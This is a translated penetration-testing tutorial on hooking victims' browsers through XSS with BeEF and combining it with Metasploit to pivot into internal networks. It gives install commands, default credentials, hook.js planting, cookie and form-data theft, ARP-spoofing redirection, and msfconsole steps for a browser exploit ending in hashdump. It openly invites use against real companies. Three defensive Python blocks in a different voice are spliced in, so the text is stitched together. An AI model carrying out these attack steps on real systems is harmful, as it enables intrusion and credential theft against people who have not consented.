Internal Network Penetration, Part 1: Getting into the Intranet Through an XSS Vulnerability


0x01: Background

BeEF is currently the most popular browser attack framework in Europe and America; its full name is The Browser Exploitation Framework Project. BeEF takes a simple XSS vulnerability and, through a pre-written piece of JavaScript (hook.js), takes control of the target host's browser. Through that browser it obtains detailed information about the host and can go on to scan the internal network. Combined with Metasploit it is an absolute killer tool for intranet penetration.

0x02: Installation

Kali Linux does not install BeEF by default; it has to be installed manually.

apt-get update
apt-get install beef-xss

0x03: Getting Started

0x03.1: Starting BeEF

Home directory:

/usr/share/beef-xss

cd /usr/share/beef-xss
./beef


127.0.0.1:3000/ui/panel

Username / password:

beef/beef


Demo page: <BeEF-XSS ip>:3000/demos/butcher/index.html

First test that the two hosts can reach each other over the network:


Visit the BeEF demo page.


The demo page embeds hook.js; visiting it -> hooked.

0x04: Planting the hook

Add a script tag to a normal page to embed the malicious script.

In a real penetration test (a public IP is needed), how do we get the victim to visit our page with hook.js embedded?

Website feedback pages and report pages are one case. Example: "Using an XSS platform to compromise the Baidu complaint-center backend".

Of course, that author used an XSS platform rather than BeEF. With BeEF you not only get the backend administrator's cookie; combined with Metasploit, you can also use the administrator's browser as a pivot into the company's internal network.
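On the defending side of 0x04, the planted tag is a `<script src>` pointing at a host the site never loads scripts from. The following is an added example, not code from the original article or from BeEF: it scans a page's HTML for script sources outside the site's allowlist and builds the Content-Security-Policy header that would stop such a script from loading. The hostnames, the sample page and the allowlist are constructed values.

```python
"""Added example, not from the original article: scan a page's HTML for
<script src> tags that load from hosts outside the site's allowlist (the
shape of a planted hook.js tag), and build the Content-Security-Policy
header that would stop such a script from loading. Hostnames below are
constructed sample values."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def find_foreign_scripts(html, page_origin, allowed_hosts):
    """Return the script URLs whose host is neither the page's own host
    nor on the allowlist. Relative URLs resolve to the page host and pass."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    own_host = (urlsplit(page_origin).hostname or "").lower()
    allowed = {h.lower() for h in allowed_hosts} | {own_host}
    foreign = []
    for src in collector.srcs:
        host = urlsplit(src).hostname  # None for relative URLs
        if host is not None and host.lower() not in allowed:
            foreign.append(src)
    return foreign


def build_csp(allowed_hosts):
    """Build a script-src directive restricted to the page itself plus the
    allowlisted hosts; object-src 'none' also blocks plugin-based loaders."""
    sources = ["'self'"] + sorted(h.lower() for h in allowed_hosts)
    return "script-src " + " ".join(sources) + "; object-src 'none'"


# Constructed sample page: two legitimate scripts and one planted hook tag
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-site.test/lib.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    allow = ["cdn.example-site.test"]
    print("foreign scripts:",
          find_foreign_scripts(SAMPLE_HTML, "https://www.example-site.test/", allow))
    print("Content-Security-Policy:", build_csp(allow))
```

Because the policy omits `'unsafe-inline'`, it also blocks the inline `<script>` block an XSS payload would inject, not only the external hook file; a site that needs inline scripts has to move them to files or use nonces. The scanner is a spot check for content you already serve; the header is what actually prevents the hook from running in visitors' browsers.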

Online Browsers -> right-click -> Use As Proxy


Combine this with ARP spoofing and MITM attacks and you can redirect essentially all HTTP requests in the intranet... (insert a sly grin here)

The BeEF panel detects a host coming online (feels like playing with Gray Pigeon and Shangxing back in the day =。= embarrassing)


Through the browser we can see a lot of information about the target host:

Browser information:
  Name
  Version
  Browser UA string
  Browser platform
  Window size
Plugin information:
  Flash
  VBScript
  WebSocket
  QuickTime
  ...
API information
Cookies
Operating system information
Date and time
Hardware information:
  CPU (32/64-bit)
  Screen resolution
  Touchscreen support

And so on

Testing with Firefox:


BeEF function modules


Common functions/modules

Browser: get browser information
--Hooked Domain
-----Get Cookie: gets the client's cookies; run it once and the cookies are shown on the right
-----Get Form Values: gets form data submitted on the page, e.g. intercepting bank card details or the username and password on a registration page
-----Redirect Browser: redirects the browser

After it runs, whatever site the target browser visits, it will be redirected to bobao.360.cn. In a real penetration test you would run an ARP attack inside the intranet and redirect all of the intranet's HTTP traffic to the page with the hook script embedded... (insert a dirty grin here)

Chrome Extensions:
Debug: test HTTP requests
Exploits: attack using browser vulnerabilities
Host: get information about the victim host
Metasploit: penetration together with Metasploit, which is the focus of this article
Network: DoS (Doser), ping, DNS enumeration, port scanning and so on
Social Engineering: social-engineering modules
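Every module above rides on the same channel: the hooked browser fetches hook.js and then polls the BeEF server on a fixed period, carrying its hook session id. That regularity is what a defender looks for in proxy logs. The following is an added example, not code from the original article or from BeEF: it runs over constructed web-proxy log lines and flags clients showing hook traffic. The indicators come from the default config.yaml values quoted later on this page (hook_file "/hook.js", hook_session_name "BEEFHOOK", xhr_poll_timeout 5000 ms); the log format, the `/poll` path and all addresses are assumptions made for the sample.

```python
"""Added example, not from the original article: run over constructed
web-proxy log lines and flag clients whose traffic looks like a BeEF hook.
The indicators come from the default config.yaml values quoted on this page
(hook_file "/hook.js", hook_session_name "BEEFHOOK", xhr_poll_timeout 5000 ms);
the log format and the poll path are assumptions made for the sample."""
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

HOOK_PATH = "/hook.js"           # beef.http.hook_file
HOOK_SESSION_PARAM = "BEEFHOOK"  # beef.http.hook_session_name
POLL_INTERVAL_S = 5.0            # beef.http.xhr_poll_timeout (5000 ms)
POLL_TOLERANCE = 0.2             # accept +/-20% jitter on the beacon period

# Constructed log lines: "<ISO timestamp> <client ip> <method> <url>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 GET http://www.example-site.test/index.html
2024-05-01T10:00:01 10.0.0.5 GET http://192.0.2.10:3000/hook.js
2024-05-01T10:00:02 10.0.0.5 GET http://192.0.2.10:3000/poll?BEEFHOOK=abc123
2024-05-01T10:00:07 10.0.0.5 GET http://192.0.2.10:3000/poll?BEEFHOOK=abc123
2024-05-01T10:00:12 10.0.0.5 GET http://192.0.2.10:3000/poll?BEEFHOOK=abc123
2024-05-01T10:00:03 10.0.0.9 GET http://www.example-site.test/news.html
2024-05-01T10:00:30 10.0.0.9 GET http://cdn.example-site.test/lib.js
"""


def parse_line(line):
    """Split one log line into (timestamp, client, method, url)."""
    ts, client, method, url = line.split(maxsplit=3)
    return datetime.fromisoformat(ts), client, method, url


def analyze(log_text):
    """Return {client_ip: [reason, ...]} for every client showing at least
    one hook indicator: a hook.js fetch, a BEEFHOOK session parameter, or
    a regular beacon to one host at the hook's polling period."""
    reasons = defaultdict(list)
    beacons = defaultdict(list)  # (client, host:port) -> request timestamps

    def note(client, reason):
        if reason not in reasons[client]:
            reasons[client].append(reason)

    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, client, _method, url = parse_line(raw)
        parts = urlsplit(url)
        if parts.path == HOOK_PATH:
            note(client, f"fetched {HOOK_PATH} from {parts.netloc}")
        if HOOK_SESSION_PARAM in parse_qs(parts.query):
            note(client, f"sent {HOOK_SESSION_PARAM} session id to {parts.netloc}")
        beacons[(client, parts.netloc)].append(ts)

    for (client, host), stamps in beacons.items():
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        regular = [d for d in deltas
                   if abs(d - POLL_INTERVAL_S) <= POLL_TOLERANCE * POLL_INTERVAL_S]
        if len(regular) >= 2:  # at least three requests spaced at the poll period
            note(client, f"beacons to {host} every ~{POLL_INTERVAL_S:.0f}s")
    return dict(reasons)


if __name__ == "__main__":
    for client, why in analyze(SAMPLE_LOG).items():
        print(client)
        for reason in why:
            print("  -", reason)
```

The path and parameter names are configurable, so the first two checks only catch an operator who kept the defaults; the beacon-period check does not depend on names and is the one worth keeping, with the period tuned to whatever interval you observe. A hit on an internal client is the point at which to look for the page that served the script tag.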

0x05: Integrating with Metasploit

BeEF config file:

/usr/share/beef-xss/config.yaml

metasploit:
    enable: false

Change it to:

metasploit:
    enable: true

The full config.yaml after the change:
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
The Metasploit extension's configuration:
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
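The two files above ship with settings that matter to whoever runs the panel as much as to anyone else on the network: the admin UI is permitted from 0.0.0.0/0, the credentials are beef/beef, the database password is beef123 and the Metasploit RPC link uses Pass=abc123 over plain HTTP. The following is an added example, not part of the original article or of BeEF itself: a small linter that reads a constructed excerpt of those settings with a minimal indentation-based reader (enough for the key: value lines shown, not a full YAML parser) and reports each exposure.

```python
"""Added example, not part of the original article or of BeEF itself: a
small linter for the settings quoted from config.yaml above. It reads a
constructed excerpt with a minimal indentation-based reader (enough for
the key: value lines shown, not a full YAML parser) and flags settings
that leave the operator's own panel exposed: the admin UI reachable from
any subnet, the shipped beef/beef credentials, and the sample passwords for
the database and the Metasploit RPC link."""


def _scalar(text):
    """Convert a YAML scalar token to bool, int or str."""
    if text in ("true", "false"):
        return text == "true"
    if text.isdigit():
        return int(text)
    if len(text) >= 2 and text[0] == text[-1] and text[0] in "'\"":
        return text[1:-1]
    return text


def parse_simple_yaml(text):
    """Parse nested 'key: value' lines into dicts using indentation.
    Comments (# ...) and blank lines are ignored; lists are not supported."""
    root = {}
    stack = [(-1, root)]  # (indent, mapping being filled)
    for raw in text.splitlines():
        line = raw.split(" #", 1)[0].rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while indent <= stack[-1][0]:
            stack.pop()
        parent = stack[-1][1]
        value = value.strip()
        if value == "":
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = _scalar(value)
    return root


def lint_beef_config(cfg):
    """Return a list of findings about exposure of the BeEF panel itself."""
    beef = cfg.get("beef", {})
    findings = []
    if beef.get("restrictions", {}).get("permitted_ui_subnet") == "0.0.0.0/0":
        findings.append("admin UI reachable from any address (permitted_ui_subnet "
                        "0.0.0.0/0); limit it to the operator's subnet or 127.0.0.1/32")
    creds = beef.get("credentials", {})
    if (creds.get("user"), creds.get("passwd")) == ("beef", "beef"):
        findings.append("default beef/beef panel credentials still in use")
    db = beef.get("database", {})
    if db.get("driver") != "sqlite" and db.get("db_passwd") == "beef123":
        findings.append("database uses the sample password beef123")
    msf = beef.get("extension", {}).get("metasploit", {})
    if msf.get("enable"):
        if msf.get("pass") == "abc123":
            findings.append("Metasploit RPC uses the sample password abc123")
        if not msf.get("ssl"):
            findings.append("Metasploit RPC connection is plaintext (ssl: false)")
    return findings


# Constructed excerpt merging the values quoted from the two config files above
SAMPLE_CONFIG = """\
beef:
    restrictions:
        permitted_hooking_subnet: "0.0.0.0/0"
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose
        host: "0.0.0.0"
        port: "3000"
    database:
        driver: "sqlite"
        db_passwd: "beef123"
    credentials:
        user:   "beef"
        passwd: "beef"
    extension:
        metasploit:
            enable: true
            host: "172.16.244.129"
            port: 55552
            pass: "abc123"
            ssl: false
"""

if __name__ == "__main__":
    for finding in lint_beef_config(parse_simple_yaml(SAMPLE_CONFIG)):
        print("-", finding)
```

The sqlite check is deliberately conditional: db_passwd is only used for mysql/postgres, as the file's own comment says, so flagging it under sqlite would be noise. The msf_path list in the extension file is not a key: value mapping and is left out of the excerpt because the minimal reader does not handle lists.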

 

Change the two parameters host and callback_host to the BeEF host's IP.

Restart the postgresql and metasploit services:

service postgresql restart && service metasploit restart

 

msfconsole   # start Metasploit
load msgrpc ServerHost=172.16.244.129 Pass=abc123

 

Restart BeEF.

When BeEF starts it reports that 246 Metasploit exploits have been loaded; with MSF updated to the latest version there should be five or six hundred.

Enter the BeEF panel (it inexplicably became 245 =。=!)


use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit   # or equivalently: run

The target machine is forcibly redirected to the URL being listened on.


MSF successfully catches the connection (but it seems the XP installed in the VM has this vulnerability patched, so no session was produced).


If the XP is unpatched, i.e. the vulnerability this exploit targets is present, a session is produced here:

sessions -i 1


screenshot: take a screenshot of the phished host and save it to a local file

sysinfo: view system information

hashdump: dump the target host's user hashes
